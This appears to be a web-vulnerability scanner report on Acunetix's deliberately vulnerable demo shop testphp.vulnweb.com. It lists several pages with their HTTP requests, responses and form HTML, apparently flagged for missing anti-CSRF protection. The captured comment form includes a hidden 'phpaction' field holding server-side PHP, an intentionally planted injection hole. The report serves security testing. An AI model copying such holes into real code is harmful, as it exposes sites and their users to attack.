href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>artist: lyzae</h2><div class='story'><p><p> Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo. Praesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a mauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus. Mauris magna eros, semper a, tempor et, rutrum et, tortor. </p> <p> Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo. Praesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a mauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus. Mauris magna eros, semper a, tempor et, rutrum et, tortor. </p></p><p><a href='listproducts.php?artist=3'>view pictures of the artist</a></p><p><a href='#' onClick="window.open('./comment.php?aid=3','comment','width=500,height=400')">comment on this artist</a></p></div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/cart.php |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="search.php?test=query" method="post"> |
Request Header - size: 259 bytes. |
GET http://testphp.vulnweb.com/cart.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:46 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 4903 |
Response Body - size: 4,903 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>you cart</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>Error</h2> <div class='story'> <p>You are not logged on. To log on please visit our <a href='login.php'>login page</a></p> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/categories.php |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="search.php?test=query" method="post"> |
Request Header - size: 265 bytes. |
GET http://testphp.vulnweb.com/categories.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:44 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6115 |
Response Body - size: 6,115 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>picture categories</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id="pageName">categories</h2> <div class='story'><a href='listproducts.php?cat=1'><h3>Posters</h3></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenati</div><div class='story'><a href='listproducts.php?cat=2'><h3>Paintings</h3></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenati</div><div class='story'><a href='listproducts.php?cat=3'><h3>Stickers</h3></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenati</div><div class='story'><a href='listproducts.php?cat=4'><h3>Graffity</h3></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenati</div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/comment.php?aid=1 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="comment.php" method="post" enctype="application/x-www-form-urlencoded" name="fComment" id="fComment"> |
Request Header - size: 413 bytes. |
GET http://testphp.vulnweb.com/comment.php?aid=1 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testphp.vulnweb.com/artists.php Upgrade-Insecure-Requests: 1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:50 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 1252 |
Response Body - size: 1,252 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html> <head> <title> comment on artist</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <style type="text/css"> <!-- body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; } --> </style> <link href="style.css" rel="stylesheet" type="text/css"> </head> <body> <form action="comment.php" method="post" enctype="application/x-www-form-urlencoded" name="fComment" id="fComment"> <br> <table border="0" width="320" height="200"> <tr> <td valign="top" class="story" align="left">Name</td> <td valign="top"><input name="name" type="text" id="name" value="<your name here>" size="25"></td> </tr> <tr> <td valign="top" class="story" align="left">Comment</td> <td valign="top"><textarea name="comment" cols="35" rows="8" wrap="VIRTUAL" id="comment"></textarea></td> </tr> <tr> <td> </td> <td align="left" valign="top"><input type="submit" name="Submit" value="Submit"><input type="hidden" name="phpaction" value="echo $_POST[comment];"></td> </tr> </table> </form> </body> </html> |
URL | http://testphp.vulnweb.com/comment.php?aid=2 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="comment.php" method="post" enctype="application/x-www-form-urlencoded" name="fComment" id="fComment"> |
Request Header - size: 413 bytes. |
GET http://testphp.vulnweb.com/comment.php?aid=2 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testphp.vulnweb.com/artists.php Upgrade-Insecure-Requests: 1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:18:01 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 1252 |
Response Body - size: 1,252 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html> <head> <title> comment on artist</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <style type="text/css"> <!-- body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; } --> </style> <link href="style.css" rel="stylesheet" type="text/css"> </head> <body> <form action="comment.php" method="post" enctype="application/x-www-form-urlencoded" name="fComment" id="fComment"> <br> <table border="0" width="320" height="200"> <tr> <td valign="top" class="story" align="left">Name</td> <td valign="top"><input name="name" type="text" id="name" value="<your name here>" size="25"></td> </tr> <tr> <td valign="top" class="story" align="left">Comment</td> <td valign="top"><textarea name="comment" cols="35" rows="8" wrap="VIRTUAL" id="comment"></textarea></td> </tr> <tr> <td> </td> <td align="left" valign="top"><input type="submit" name="Submit" value="Submit"><input type="hidden" name="phpaction" value="echo $_POST[comment];"></td> </tr> </table> </form> </body> </html> |
URL | http://testphp.vulnweb.com/comment.php?aid=3 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="comment.php" method="post" enctype="application/x-www-form-urlencoded" name="fComment" id="fComment"> |
Request Header - size: 413 bytes. |
GET http://testphp.vulnweb.com/comment.php?aid=3 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testphp.vulnweb.com/artists.php Upgrade-Insecure-Requests: 1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:18:19 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 1252 |
Response Body - size: 1,252 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html> <head> <title> comment on artist</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <style type="text/css"> <!-- body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; } --> </style> <link href="style.css" rel="stylesheet" type="text/css"> </head> <body> <form action="comment.php" method="post" enctype="application/x-www-form-urlencoded" name="fComment" id="fComment"> <br> <table border="0" width="320" height="200"> <tr> <td valign="top" class="story" align="left">Name</td> <td valign="top"><input name="name" type="text" id="name" value="<your name here>" size="25"></td> </tr> <tr> <td valign="top" class="story" align="left">Comment</td> <td valign="top"><textarea name="comment" cols="35" rows="8" wrap="VIRTUAL" id="comment"></textarea></td> </tr> <tr> <td> </td> <td align="left" valign="top"><input type="submit" name="Submit" value="Submit"><input type="hidden" name="phpaction" value="echo $_POST[comment];"></td> </tr> </table> </form> </body> </html> |
URL | http://testphp.vulnweb.com/disclaimer.php |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="search.php?test=query" method="post"> |
Request Header - size: 265 bytes. |
GET http://testphp.vulnweb.com/disclaimer.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:46 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 5524 |
Response Body - size: 5,524 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>disclaimer</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id="pageName">Disclaimer</h2> <div class="story"> <h6>Please read carefully</h6> <p>This website is created to demonstrate the abilities of Acunetix new product <strong>WEB Vulnerability Scanner</strong>.</p> It is not intended to be a real online shop. Also this website was constructed with common web programming errors so it is buggy. <p>Please do not post any confidential information on this site. Do not give any creditcard number or real address, nor e-mail or website addresses.</p> <p>Information you post on this site are by no means private nor protected!</p> <p>All images on this site were generated with fre software <a href="http://www.eclectasy.com/Fractal-Explorer/index.html" target="_blank"> <strong>Fractal Explorer</strong></a>.</p> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/guestbook.php |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" name="faddentry"> |
Request Header - size: 264 bytes. |
GET http://testphp.vulnweb.com/guestbook.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:47 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 5390 |
Response Body - size: 5,390 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>guestbook</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <div class="story"> <table width="100%" cellpadding="4" cellspacing="1"><tr><td colspan="2"><h2>Our guestbook</h2></td></tr><tr><td align="left" valign="middle" style="background-color:#F5F5F5"><strong></strong></td><td align="right" style="background-color:#F5F5F5">12.13.2022, 4:16 am</td></tr><tr><td colspan="2"><img src="/images/remark.gif"> </td></tr></table> </div> <div class="story"> <form action="" method="post" name="faddentry"> <input type="hidden" name="name" value="anonymous user"> <textarea name="text" rows="5" wrap="VIRTUAL" style="width:500px;"></textarea> <br> <input type="submit" name="submit" value="add message"> </form> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> 